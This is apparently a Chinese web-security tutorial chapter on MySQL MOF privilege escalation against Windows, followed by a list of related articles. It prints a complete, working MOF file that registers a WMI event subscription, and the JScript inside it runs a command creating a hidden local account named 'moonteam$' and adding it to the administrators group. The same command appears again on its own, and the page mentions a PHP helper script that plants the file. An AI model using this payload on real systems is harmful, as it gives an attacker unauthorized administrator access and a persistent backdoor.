mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权
WEB安全第六章提权篇12 mof提权
1、mof是什么
托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Studio Analyzer 使用。 在 MOF 文件中创建提供程序、事件类别和事件类的实例,并且定义想要分析的自定义对象,之后,就可以对该文件进行编译
2、mof提权的原理:
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做”托管对象格式”其作用是每隔五秒就会去监控进程创建和死亡。
其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。
3、modf提权过程
mof文件
mof文件
pragma namespace("\\.\root\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
使用脚本提权
http://www.demoasp.com/mof.php
填写好mysq的账号和密码
文件会自动写到good目录下
net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/archives/450
mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权相关推荐
- oracle延时盲注如何防止,【原创】WEB安全第四章SQL注入篇21 oracle 延时注入
WEB安全第四章SQL注入篇21 oracle 延时注入 1.简介 DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制.首先,不能直接将该函数注入子查询中,因为O ...
- Unix原理与应用学习笔记----第六章 文件的基本属性2
Unix原理与应用学习笔记----第六章 文件的基本属性2 改变文件权限命令:chmod 提示:文件或目录创建后,就被赋予一组默认的权限.所有的用户都有读,只有文件的所有者才有写. 相对权限设置 Ch ...
- mysql mof提权原理_【提权】MySQL提权之MOF
0x01 前言 Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件: 将MOF文件执行为命令行参数及Mofcomp.exe文件 使用IMofCompiler ...
- %3c xml 和php冲突,[原创]WEB安全第五章 漏洞学习与利用11 xml实体注入
WEB安全第五章 漏洞学习与利用11 xml实体注入 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数 ...
- python归一化 增大差异_简学Python第六章__class面向对象编程与异常处理
Python第六章__class面向对象编程与异常处理 欢迎加入Linux_Python学习群 群号:478616847 目录: 面向对象的程序设计 类和对象 封装 继承与派生 多态与多态性 特性pr ...
- mysql mof提权原理_(新安全原创精华)Mysql扩展文件MOF提权详讲
本帖最后由 阿甫哥哥 于 2016-8-8 17:24 编辑 哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了. 希望大家可以支持我们,我们也会做得更好.无论是 ...
- mysql mof提权原理_关于mysql mof提权研究
无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间. 利用前提:操作系统为windows 操作系统版本不宜太高,2008测 ...
- mysql插入10万测试_[原创]java使用JDBC向MySQL数据库批次插入10W条数据测试效率
使用JDBC连接MySQL数据库进行数据插入的时候,特别是大批量数据连续插入(100000),如何提高效率呢? 在JDBC编程接口中Statement 有两个方法特别值得注意: 通过使用addBatc ...
- mysql驱动加载原理_老调重弹:JDBC系列 之 lt;驱动载入原理全面解析gt;
前言 近期在研究Mybatis框架,因为该框架基于JDBC.想要非常好地理解和学习Mybatis,必需要对JDBC有较深入的了解.所以便把JDBC 这个东东翻出来.好好总结一番,作为自己的笔记,也是给 ...
最新文章
- linux mysql设置开机启动脚本_linux下添加oracle自启动脚本
- 框架应用 : Spring - 开发详述
- 二极管的反向恢复过程
- dos配置java_windows dos命令配置JAVA环境变量
- 根据对象的属性去重,获取新数组
- 让驰骋工作流程引擎 ccbpm使用自定义表单来实现自己的业务逻辑.
- 高德地图偏移android,关于JS接高德地图API,以及坐标偏移坐标转换(示例代码)
- 金蝶计算机快捷键,金蝶KIS专业版常用快捷键列表.doc
- 电阻电容串联并联关系,一辈子受益
- Veeam 安装部署 - 部署 Veeam Backup Replication
- 大学四年,从小白到大神,全网最硬核算法学习攻略,不接受反驳
- 基于蒙特卡洛法的规模化电动车有序充放电及负荷预测(PythonMatlab实现)
- 游戏编辑器制作(7)
- 微信小程序+云开发项目实战:商品类小程序(化妆品门店)
- [20190328]PPT中的png图片去底色(透明化)
- STM32系列——手把手教你蓝牙模块HC05、HC06的使用,重在“用起来”(HAL库)
- python获取网页图片_python抓取网页中的图片示例
- linux下jdk安装步骤_jdk下载安装步骤
- 台式计算机读取不了移动硬盘,移动硬盘插入win7电脑一直无法识别的几种原因和解决方法...
- OPENJUDGE 1.7 11:潜伏者